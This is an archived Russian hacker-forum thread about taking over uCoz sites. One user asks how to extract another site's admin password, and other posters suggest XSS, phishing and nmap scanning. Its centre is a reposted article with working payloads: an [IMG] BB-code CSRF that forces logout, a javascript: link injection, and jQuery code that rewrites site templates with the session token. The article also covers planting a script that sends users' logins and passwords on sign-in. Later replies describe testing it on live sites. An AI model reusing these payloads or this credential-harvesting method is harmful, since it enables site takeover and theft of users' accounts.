Просмотр полной версии : ucoz что можно сделать
dimkaa123
20.10.2012, 15:35
Что можно сделать с сайтом на Ucoz, просто у меня его украли, а я как то вернуть хочу. Даже домен у меня остался. Есть какие то уязвимости у такого сайта? может как то можно пароль от ПУ и ответ на секретку вытащить, узнать. Или как по другому?
Давай на чистоту, я думаю, что ты хочешь ломануть НЕ свой сайт. Во-вторых, подумай головой, как думаешь если бы в ucoz была уязвимость, то она бы распространялось на один сайт или на всю систему?
GoodGoogle
20.10.2012, 20:51
XSS, его вроде до сих пор не залатали.... Была темка когда то на античате, но я ее удалил) по просьбе одного человека.
на ucoz нет поддержки php, только html там багов нету кроме xss
XSS вам ничего не даст, да она там есть, только куки хранятся на сторонних серверах
dimkaa123 said:
Что можно сделать с сайтом на Ucoz, просто у меня его украли, а я как то вернуть хочу. Даже домен у меня остался. Есть какие то уязвимости у такого сайта? может как то можно пароль от ПУ и ответ на секретку вытащить, узнать. Или как по другому?
попробуй фейком угнать
если хтмл отключон то врядли ты его угонишь.скорее даже наверняка ниче не сможешь сделать.если он действительно твой то пиши в суппорт юкоза.побольше инфы им предоставь.поверят-может проверят-может вернут.и вообще не понятно.сайт у тебя угнали а профиль unet тоже чтоли?или у тебя его и небыло.насколько мне известно,то сайты на юкозе именно через этот профиль создвются.покрайней мере я именно через него управлял своими.или ты чета не договариваешь или я чета не понимаю
Саранча said:
XSS Попробуй.
толку от хсс не будет.активных там нет.а пассивных смысл?даже если и придут куки то херли толку.ниче он с ними сделать не сможет.ибо на юкозе у одмина привязка по йп по умолчанию стоит.
Я даже сомневаюсь что ему удастся впарить ссыль челу который якобы угнал его сайт.я даже уверен в этом
Pirotexnik
24.10.2012, 17:13
Как-то раз знакомый хекал сервер юкозовский. Причем там был паблик баг. Так что пройдись nmaр-ом на всякий случай.
Существует такая система для клепания сайтов под названием uCoz. Пользуются ей в основном те, кто не знаком с такими окуенно сложными вещами как Joomla, DLE и пр. — школота. Но прогуливаясь по просторам интернета часто натыкаешься на эти чудо-сайты. И иногда просто хочется взять и развидеть это го*но. Собственно пару способов это сделать можно узнать под катом.
Первая уязвимость: BB код
Сама уязвимость заключается в возможности «подгрузки» не картинки, а чего-нибудь другого. К примеру страницы выхода из аккаунта, которая располагается по адресу адрес_сайта/index/10:[I M G]http://адрес_сайта/index/10?.jpg[/I M G] Кидаем себе в подпись или, что лучше, кидаем в чат и наслаждаемся зрелищем. Кучка школьников наверняка где-то пробует войти в свой профиль, тут же выходит из него и ловит окуенные баттхёрты ^__^.
Вторая уязвимость: BB код [U R L]
Учитывая, что на козе хостятся более миллиона сайтов смешной является уязвимость, которая даёт возможность использовать псевдопротокол «javascript:». Что смешно, не проверяется даже является ли строка ссылкой вообще >_');]Не нажимать[/U R L][/CODE] Собственно, а как это использовать?
Используя jQuery конструкции вида/*Получаем исходник шаблона страницы*/
$.get('/tmpls/?a=tmpl;m=3;t=3', function (o) {
/*Делаем POST запрос с новыми параметрами*/
$.post('/tmpls/', {
//как угодно изменяем шаблон до этой функции или прямо тут через регэкспы
//а далее подставляем нужные параметры
tmpl: $('textarea[name="tmpl"]', o).val(),
a: 'tmpl',
t: '3',
m: '3',
tt: '1',
ssid: $('input[name="ssid"]', o).val()
});
});
/*Вообщем обычные GET и POST запросы с нужными вам параметрами*/ у вас есть также возможность удалённо с помощью скрипта, который вы внедрите, изменять шаблоны различных страниц сайта. Это, можно считать, отдельная уязвимость. Так вот, вы можете внедрить в любой шаблон скрипт по отправке полей «имя» и «пароль» по нажатию на кнопку «вход». Для этого киньте админу в личку скрипт, для установки скрипта, собирающего пароли на сайт. Подождите пока он нажмёт на ссылку. И собирайте логины. Уже через логины можно получить доступ к сайтам на укозе конкретных пользователей, а также к другим (возможно) сайтам на которых пользователь зареген через их почту.
В тегах U R L и I M G убрать пробелы.
Автор статьи : TickHack
щас проверим в топе юкоза)
mod_ said:
щас проверим в топе юкоза)
отпиши о результате. тоже интересно)
да.в каком году интересно эта статья писалась
пока только про чат могу сказать конкретно.при попытке вставить туда вв коды [урл] и [имг] выскакивает окошко.обнаруженны запрещенные ввкоды ([имг] или [урл]) на паре сайтов пробовал.одно и тоже.где прокатит не стал искать.сайтов дохрена)
+не на всех сайтах чат стоит
mod_ said:
пока только про чат могу сказать конкретно.при попытке вставить туда вв коды [урл] и [имг] выскакивает окошко.обнаруженны запрещенные ввкоды ([имг] или [урл]) на паре сайтов пробовал.одно и тоже.где прокатит не стал искать.сайтов дохрена)
+не на всех сайтах чат стоит
У меня прокатило, но как не старался что и теги имг как и теги урл получались как будто они простой текст.
Ошибки быть не может. Бага уже такого нету
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot